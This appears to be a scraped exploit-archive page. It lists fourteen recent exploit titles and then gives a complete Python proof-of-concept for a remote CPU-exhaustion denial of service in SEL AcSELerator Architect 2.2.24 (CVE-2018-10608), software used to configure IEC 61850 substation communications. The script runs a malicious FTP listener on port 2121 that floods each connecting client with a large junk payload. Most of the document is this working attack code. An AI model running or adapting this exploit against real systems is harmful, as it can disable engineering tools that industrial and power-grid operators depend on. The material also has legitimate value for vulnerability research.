a91c0acafc
14 changes to exploits/shellcodes Sandboxie 5.30 - 'Programs Alerts' Denial of Service (PoC) CEWE Photoshow 6.4.3 - 'Password' Denial of Service (PoC) CEWE Photo Importer 6.4.3 - '.jpg' Denial of Service (PoC) WeChat for Android 7.0.4 - 'vcodec2_hls_filter' Denial of Service ZOC Terminal 7.23.4 - 'Script' Denial of Service (PoC) ZOC Terminal v7.23.4 - 'Private key file' Denial of Service (PoC) ZOC Terminal v7.23.4 - 'Shell' Denial of Service (PoC) Axessh 4.2 - 'Log file name' Denial of Service (PoC) SEL AcSELerator Architect 2.2.24 - CPU Exhaustion Denial of Service Iperius Backup 6.1.0 - Privilege Escalation VMware Workstation 15.1.0 - DLL Hijacking JetAudio jetCast Server 2.0 - 'Log Directory' Local SEH Alphanumeric Encoded Buffer Overflow DeepSound 1.0.4 - SQL Injection Interspire Email Marketer 6.20 - 'surveys_submit.php' Remote Code Execution
69 lines
No EOL
2 KiB
Python
Executable file
69 lines
No EOL
2 KiB
Python
Executable file
#!/usr/bin/env python
|
|
# coding: utf8
|
|
#
|
|
#
|
|
# SEL AcSELerator Architect 2.2.24 Remote CPU Exhaustion Denial of Service
|
|
#
|
|
#
|
|
# Vendor: Schweitzer Engineering Laboratories, Inc.
|
|
# Product web page: https://www.selinc.com
|
|
# Affected version: 2.2.24.0 (ICD package version: 2.38.0)
|
|
#
|
|
# Summary: Substation communications networks using the IEC 61850
|
|
# MMS and GOOSE protocols require a systemic methodology to configure
|
|
# message publications and subscriptions. acSELerator Architect
|
|
# SEL-5032 Software is a Microsoft Windows application that streamlines
|
|
# the configuration and documentation of IEC 61850 control and SCADA
|
|
# communications.
|
|
#
|
|
# Description: AcSELerator Architect is prone to a denial-of-service (DoS)
|
|
# vulnerability. An attacker may exploit this issue to cause CPU exhaustion,
|
|
# resulting in application rendered non-responsive (AppHangB1 event).
|
|
#
|
|
# Tested on: Microsoft Windows 7 Ultimate SP1 (EN) 32bit
|
|
#
|
|
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
#
|
|
#
|
|
# Advisory: https://applied-risk.com/index.php/download_file/view/106/165
|
|
# ICS-CERT: https://ics-cert.us-cert.gov/advisories/ICSA-18-191-02
|
|
# CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10608
|
|
#
|
|
# 22.02.2018
|
|
#
|
|
|
|
from pwn import *
|
|
|
|
cool_data = '\x4A' * 54321
|
|
|
|
def bunn():
|
|
|
|
print """
|
|
####################################
|
|
SEL AcSELerator Architect 2.2.24.0
|
|
FTP Client Remote CPU Exhaustion
|
|
|
|
(c) 2018
|
|
####################################
|
|
"""
|
|
|
|
def main():
|
|
|
|
p = listen(2121)
|
|
try:
|
|
log.warn('Payload ready for deployment...(Ctrl-C for exit)\n')
|
|
while True:
|
|
p.wait_for_connection()
|
|
if p:
|
|
sys.stdout.write('▓≡')
|
|
p.send(cool_data)
|
|
except KeyboardInterrupt:
|
|
p.success('OK!')
|
|
p.close()
|
|
except EOFError:
|
|
print "Unexpected error brah:", sys.exc_info()[0]
|
|
p.close()
|
|
|
|
if __name__ == '__main__':
|
|
bunn()
|
|
main() |